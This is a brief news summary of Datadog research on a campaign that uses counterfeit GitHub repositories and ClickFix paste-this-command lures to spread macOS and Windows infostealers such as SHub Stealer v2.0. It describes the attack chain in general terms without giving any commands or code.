Datadog has uncovered a campaign using counterfeit GitHub repositories to impersonate legitimate software companies, employing the ClickFix technique to trick users into installing infostealers. The operation is ongoing and appears to be evolving, with the threat actor reportedly expanding functionality to include Windows-based infostealers alongside the existing macOS variants. A new infostealer, dubbed SHub Stealer v2.0, has been identified, featuring enhanced capabilities like persistence and remote access. The attack method resembles package typosquatting but targets users of well-known tech companies instead of relying on developer mistakes. By shifting the execution to the victim, the ClickFix technique makes it easier for attackers to execute their malicious code without needing to exploit vulnerabilities directly. This allows for a scalable approach, as the same initial access mechanism can be reused across different campaigns and malware families. Victims encounter a sophisticated redirect chain upon clicking a download link from the fake repository. They are led to a site that mimics GitHub and uses custom JavaScript to determine their operating system. Depending on the OS, users are sent to a ClickFix page or a Windows ZIP download. The ClickFix page prompts macOS users to copy a command into their terminal, which downloads and executes malicious scripts. This command is crafted to appear legitimate, furthering the deception. Datadog's monitoring identified multiple malicious repositories masquerading as legitimate applications, including one posing as a "Datadog Desktop App." These impersonations lack actual application code and primarily serve to redirect victims to malicious sites. The perpetrators have also improved their infrastructure and telemetry collection methods, making their operations more sophisticated and harder to detect.